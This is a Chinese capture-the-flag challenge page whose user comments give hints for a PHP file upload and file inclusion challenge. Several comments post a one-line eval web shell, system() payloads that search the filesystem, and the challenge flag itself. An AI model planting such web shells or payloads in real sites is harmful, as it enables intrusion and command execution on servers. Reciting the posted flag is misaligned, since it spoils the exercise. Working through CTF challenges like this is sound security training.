评分(0)
暂无评分
解题动态
花舞Flower 攻破了该题 2天前
kaiyafanfan123 攻破了该题 3天前
wywitkey 攻破了该题 8天前
梦游的小狐狸 攻破了该题 19天前
forces 攻破了该题 25天前
233031107陈如和 攻破了该题 1月前
233031146 攻破了该题 1月前
233031111 攻破了该题 1月前
15268769500 攻破了该题 1月前
233031120 攻破了该题 1月前
19012953963 攻破了该题 1月前
lostzealhe 攻破了该题 1月前
233031124 攻破了该题 1月前
233031121 攻破了该题 1月前
1433223520 攻破了该题 1月前
N3verL4nd 攻破了该题 1月前
xcngg 攻破了该题 1月前
1031368023 攻破了该题 1月前
RELAX 攻破了该题 1月前
评论
wywitkey 8天前
举报
3.上传一句话图片马,再用read.php?filename=读取你上传的文件,找到flag(一句话木马必须是system命令,这样在读取文件时才能执行),本题的flag在环境变量里,真是没想到.....
wywitkey 8天前
举报
1.看页面代码有提示:read.php?filename=;2.根据伪协议读取index.php代码及read.php代码,找到上传文件的过滤规则(上传文件不能有“php”,read不能有“flag”,上传的文件会被重新命名);
wywitkey 8天前
举报
前面的这几位没有一个说的靠谱,这不是单纯的upload题,还考了文件包含和命令注入 新手去看wp吧,2金币花得值。
ljt1016 2月前
举报
为什么这道题一句话木马上传成功后,无法用蚁剑连接,用正确的方法去访问上传的php文件,只会回显php的内容(即一句话木马)求师傅回答
silentiron 11月前
举报
0xGame{upl0ad_f1le_causes_danger!!!}
zhaiye 1年前
举报
0xGame{upl0ad_f1le_causes_danger!!!}
2728462336 1年前
举报
文件上传加文件包含,上传图片码内容为<?=eval($_POST[123]);?>,文件包含连接shell即可
倦鸟叫了一整天 5月前
举报
@206297162 连接上传的文件
206297162 1年前
举报
大佬改如何连接
不会编程的崽 1年前
举报
<?=system('grep -r "0xGame" / ')> <?=system('cat path')>